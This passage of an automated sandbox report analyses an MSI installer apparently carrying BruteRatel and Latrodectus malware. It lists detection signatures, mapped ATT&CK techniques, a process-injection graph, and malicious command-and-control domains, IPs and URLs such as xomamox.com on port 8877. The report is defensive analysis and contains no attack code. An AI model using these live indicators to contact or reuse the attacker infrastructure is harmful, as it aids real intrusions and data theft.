            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 8104, type: MEMORYSTR
            Source: Yara matchFile source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Yara detected Latrodectus
            Source: Yara matchFile source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		OS Credential Dumping2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop ProtocolData from Removable Media11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)82
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets34
            System Information Discovery            		SSHKeylogging113
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading            		Cached Domain Credentials31
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Virtualization/Sandbox Evasion            		DCSync1
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job82
            Process Injection            		Proc Filesystem3
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            System Network Configuration Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555052 Sample: lavi.msi Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 37 xomamox.com 2->37 39 rolefenik.com 2->39 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Antivirus detection for URL or domain 2->55 57 6 other signatures 2->57 8 rundll32.exe 2->8         started        10 msiexec.exe 14 40 2->10         started        14 msiexec.exe 2 2->14         started        signatures3 process4 file5 16 rundll32.exe 12 8->16         started        27 C:\Windows\Installer\MSI2701.tmp, PE32 10->27 dropped 29 C:\Users\user\AppData\Roaming\apptext.dll, PE32+ 10->29 dropped 31 C:\Windows\Installer\MSI25D6.tmp, PE32 10->31 dropped 33 3 other files (none is malicious) 10->33 dropped 59 Drops executables to the windows directory (C:\Windows) and starts them 10->59 20 msiexec.exe 10->20         started        22 MSI2701.tmp 10->22         started        signatures6 process7 dnsIp8 35 xomamox.com 80.66.76.106, 49705, 58081, 58085 VAD-SRL-AS1MD Russian Federation 16->35 43 System process connects to network (likely due to code injection or exploit) 16->43 45 Contains functionality to inject threads in other processes 16->45 47 Injects code into the Windows Explorer (explorer.exe) 16->47 49 5 other signatures 16->49 24 explorer.exe 45 1 16->24 injected signatures9 process10 dnsIp11 41 rolefenik.com 172.67.191.232, 443, 58086, 58087 CLOUDFLARENETUS United States 24->41

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\apptext.dll0%ReversingLabs
            C:\Windows\Installer\MSI2527.tmp0%ReversingLabs
            C:\Windows\Installer\MSI2586.tmp0%ReversingLabs
            C:\Windows\Installer\MSI25B6.tmp0%ReversingLabs
            C:\Windows\Installer\MSI25D6.tmp0%ReversingLabs
            C:\Windows\Installer\MSI2701.tmp0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://xomamox.com:8877/49100%Avira URL Cloudmalware
            https://xomamox.com:8877/gump.phpx100%Avira URL Cloudmalware
            https://rolefenik.com/test/W0%Avira URL Cloudsafe
            https://rolefenik.com/test/Q0%Avira URL Cloudsafe
            https://rolefenik.com/test/O0%Avira URL Cloudsafe
            https://rolefenik.com/0%Avira URL Cloudsafe
            https://rolefenik.com/test/xtMenuArray_198721XV0%Avira URL Cloudsafe
            https://rolefenik.com/test/v0%Avira URL Cloudsafe
            https://rolefenik.com/test/ser-l1-1-00%Avira URL Cloudsafe
            https://xomamox.com:8877/gump.php100%Avira URL Cloudmalware
            https://xomamox.com:8877/forest.phpl100%Avira URL Cloudmalware
            https://rolefenik.com/=0%Avira URL Cloudsafe
            https://rolefenik.com/test/0%Avira URL Cloudsafe
            https://rolefenik.com/00%Avira URL Cloudsafe
            https://xomamox.com:8877/forest.php100%Avira URL Cloudmalware
            https://rolefenik.com/F0%Avira URL Cloudsafe
            https://xomamox.com:8877/re100%Avira URL Cloudmalware
            https://ergiholim.com/test/0%Avira URL Cloudsafe
            https://xomamox.com:8877/gump.php-100%Avira URL Cloudmalware
            https://xomamox.com:8877/100%Avira URL Cloudmalware
            https://xomamox.com/100%Avira URL Cloudmalware
            https://rolefenik.com/test/:0%Avira URL Cloudsafe
            https://xomamox.com:8877/T100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            rolefenik.com
            		172.67.191.232
            		truefalse
              		high
              xomamox.com
              		80.66.76.106
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://rolefenik.com/test/true
                • Avira URL Cloud: safe
                		unknown
                https://ergiholim.com/test/true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://powerpoint.office.comerexplorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    https://android.notify.windows.com/iOSA4explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://rolefenik.com/test/Qexplorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://rolefenik.com/test/Oexplorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://xomamox.com:8877/49rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://excel.office.comexplorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.microexplorer.exe, 0000000B.00000002.3898266932.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3898287903.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3894546786.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://wns.windows.com/EM0explorer.exe, 0000000B.00000000.2294125458.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://rolefenik.com/test/Wexplorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://xomamox.com:8877/gump.phpxrundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://rolefenik.com/explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://x1.c.lencr.org/0rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.i.lencr.org/0rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.microsoft.cexplorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://rolefenik.com/test/xtMenuArray_198721XVexplorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://android.notify.windows.com/iOSdexplorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://rolefenik.com/test/ser-l1-1-0explorer.exe, 0000000B.00000002.3906622826.000000000C061000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://rolefenik.com/test/vexplorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://xomamox.com:8877/gump.phprundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://r11.o.lencr.org0#rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://xomamox.com:8877/forest.phplrundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://ns.adobeSexplorer.exe, 0000000B.00000002.3895491206.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289118490.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://outlook.comexplorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://r11.i.lencr.org/0rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://rolefenik.com/0explorer.exe, 0000000B.00000002.3906622826.000000000C08D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.thawte.com/cps0/lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drfalse
                                                                                          		high
                                                                                          https://rolefenik.com/=explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://android.notify.windows.com/iOSexplorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://word.office.com48explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.thawte.com/repository0Wlavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drfalse
                                                                                                		high
                                                                                                https://xomamox.com:8877/rerundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://xomamox.com:8877/forest.phprundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.advancedinstaller.comlavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drfalse
                                                                                                        		high
                                                                                                        https://xomamox.com:8877/rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://rolefenik.com/Fexplorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://api.msn.com/explorer.exe, 0000000B.00000002.3896365823.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289872722.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866104583.000000000704B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://xomamox.com/rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://xomamox.com:8877/gump.php-rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
